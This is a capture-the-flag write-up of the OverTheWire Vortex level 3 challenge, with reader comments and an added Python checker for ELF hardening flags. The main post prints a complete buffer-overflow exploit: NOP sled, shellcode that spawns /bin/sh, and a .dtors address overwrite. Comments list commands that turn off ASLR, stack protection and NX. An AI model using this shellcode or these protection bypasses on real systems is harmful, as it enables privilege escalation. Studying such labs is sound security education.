Overthewire Vortex Level3

You can find a very detailed description of this level on the following blog.

This level is a bit harder, because you not only have to take control of the execution flow, but you also have to provide the missing functionality for raising the privilege level and starting a shell. So you will inject some code through the buffer, and redirect the execution flow to run that code.

Solving the level (in big steps):

  • you should read the doc about the .dtors section
  • you should also read the phrack article about buffer overflows
  • you must understand(!) what the code is doing
  • i think you’ve guessed by now that you will overflow the buffer and overwrite the lpp variable
  • as you can see, the start address of the buffer will be written to **lpp
  • that situation is ideal: put the shellcode into the buffer and point **lpp to the end of the destructor list (we want to overwrite this address)
  • so we only have to find a memory address which points to the “end of the destructor list” entry
  • once we have found that address, we put the shellcode into the buffer and overflow lpp with the address of the memory cell we found

I’ve used the following:

  • a 52 byte nop sled
  • shellcode borrowed from the above mentioned site (you can use your own, or download one from exploit-db)
  • i was too lazy to calculate the exact address of lpp, so i’m writing the address many times, which will reach lpp as well

/vortex/level3 `python -c 'print "\x90"*52 + \
"\xeb\x2b\x5e\x31\xc0\xb0\x46\x31\xdb\x66\xbb\xfa\x01\x31\xc9\x66" + \
"\xb9\xfa\x01\xcd\x80\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89" + \
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xd0\xff\xff" + \
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff" + \
"\x98\x94\x04\x08"*30'`
This entry was posted in Wargame.

5 Responses to Overthewire Vortex Level3

  1. Rob says:

    I created a very similar solution, with slightly different shellcode though. I did have one problem however, maybe you have a solution to that – the binaries on the wargame server are compiled without any type of “modern” protection, so that I was unable to create a similarly vulnerable binary on my local machine using up-to-date gcc etc. Turning off stack protection isn’t the problem because this can be achieved by using -fno-stack-protector, but the binaries I get have other features like hidden sections which cannot be overwritten. Do you have any idea how to intentionally compile and link a binary which is as similar as possible to the ones on the wargame environment? (Let’s say I don’t want to scp the binary to my local box) 😉

    • axtaxt says:

      I’m usually compiling and running my binaries on the OTW server, or scp-ing them to my local box.

      If you want to play with them locally, you first have to disable ASLR:

      echo 0 > /proc/sys/kernel/randomize_va_space

      Then try to disable noexec stack:

      execstack -s

      or compile with the following linker option:

      -Wl,-z execstack

      Of course you will need

      -fno-stack-protector -U_FORTIFY_SOURCE

      A fun thing I’ve heard about, but never tried, is that instead of

      memcpy(destination, source, size)

      use

      (memcpy) memcpy(destination, source, size)

      which disables a few checking macros.

    • axtaxt says:

      I’ve just googled it, and found as an extra option:

      -fno-mudflap
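The exchange above is about how much of the “modern” protection a given binary actually carries. As an added example (not part of the post and not from any of the commenters), here is a small Python checker that reads the program headers of an ELF64 file and reports three of the properties discussed: whether the stack is requested as executable (the PT_GNU_STACK header, which is what execstack -s and -z execstack toggle), whether the loader is asked to make relocation data read-only (PT_GNU_RELRO; “full” if eager binding is also requested via DT_BIND_NOW or DF_BIND_NOW), and whether the executable is position independent (ET_DYN). The two sample images are constructed inline with a helper so the script runs offline; parse_elf64, build_sample, check_file and the sample names are this example’s own. Stack canaries are not detected here, because that would need the symbol table (a reference to __stack_chk_fail), which this parser does not read.

```python
"""Added example: report a few ELF64 hardening facts from program headers."""
import struct

# Program-header types and flags (values from the ELF / GNU ABI specs).
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
# Dynamic-section tags relevant to full RELRO.
DT_NULL, DT_BIND_NOW, DT_FLAGS = 0, 24, 30
DF_BIND_NOW = 0x8
ET_EXEC, ET_DYN = 2, 3


def parse_elf64(data: bytes) -> dict:
    """Return {'pie', 'nx_stack', 'relro'} for a little-endian ELF64 image in memory."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    # Without a PT_GNU_STACK header the x86 kernel falls back to an executable
    # stack, so "no header" counts as "not NX" until proven otherwise.
    facts = {"pie": e_type == ET_DYN, "nx_stack": False, "relro": "none"}
    dynamic = b""
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags, p_offset, _va, _pa, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, off)
        if p_type == PT_GNU_STACK:
            facts["nx_stack"] = not (p_flags & PF_X)  # PF_X set == execstack
        elif p_type == PT_GNU_RELRO:
            facts["relro"] = "partial"
        elif p_type == PT_DYNAMIC:
            dynamic = data[p_offset:p_offset + p_filesz]

    # Full RELRO additionally needs eager binding so the GOT can be sealed too.
    if facts["relro"] == "partial":
        for off in range(0, len(dynamic) - 15, 16):
            d_tag, d_val = struct.unpack_from("<qQ", dynamic, off)
            if d_tag == DT_NULL:
                break
            if d_tag == DT_BIND_NOW or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW):
                facts["relro"] = "full"
                break
    return facts


def check_file(path: str) -> dict:
    """Convenience wrapper for a binary on disk."""
    with open(path, "rb") as fh:
        return parse_elf64(fh.read())


def build_sample(e_type: int, segments, dyn_entries=None) -> bytes:
    """Assemble a minimal, non-runnable ELF64 image (constructed test input):
    header, one program header per (p_type, p_flags) pair and, optionally, a
    PT_DYNAMIC segment holding the given (d_tag, d_val) entries."""
    phdr_list = list(segments)
    dyn = b""
    if dyn_entries is not None:
        phdr_list.append((PT_DYNAMIC, 0x6))
        dyn = b"".join(struct.pack("<qQ", t, v) for t, v in dyn_entries)
        dyn += struct.pack("<qQ", DT_NULL, 0)
    dyn_off = 64 + 56 * len(phdr_list)
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)  # ELF64, LE, version 1
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, 64, 0, 0,
                        64, 56, len(phdr_list), 64, 0, 0)
    phdrs = b""
    for p_type, p_flags in phdr_list:
        is_dyn = p_type == PT_DYNAMIC
        phdrs += struct.pack("<IIQQQQQQ", p_type, p_flags,
                             dyn_off if is_dyn else 0, 0, 0,
                             len(dyn) if is_dyn else 0,
                             len(dyn) if is_dyn else 0, 8)
    return ehdr + phdrs + dyn


# Constructed samples: a wargame-style build (executable stack, no RELRO, not
# PIE) next to a hardened build (NX stack, full RELRO, PIE).
WARGAME_STYLE = build_sample(ET_EXEC, [(PT_GNU_STACK, 0x7)])
HARDENED = build_sample(ET_DYN, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)],
                        dyn_entries=[(DT_FLAGS, DF_BIND_NOW)])

if __name__ == "__main__":
    for name, image in (("wargame-style", WARGAME_STYLE), ("hardened", HARDENED)):
        print(name, parse_elf64(image))
```

To audit a real binary, call check_file("/path/to/binary") and compare the result with the flags the binary was built with: a build using -z execstack should come back with nx_stack False, and a build without -z relro should report relro "none".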

  2. chris says:

    As far as i know, even if you are able to overwrite the .dtors section (i.e., compiled with no-relro), it is meaningless because the destructor is never invoked.

    • axtaxt says:

      Hi chris. Why do you think that the destructors are not invoked? Try this simple example:

      #include <stdio.h>
      /* runs before main, from the constructor list */
      __attribute__((constructor)) static void C() { printf("CTOR\n"); }
      /* runs after main returns, from the destructor list */
      __attribute__((destructor)) static void D() { printf("DTOR\n"); }
      int main() { printf("MAIN\n"); return 0; }

      It produces:

      CTOR
      MAIN
      DTOR
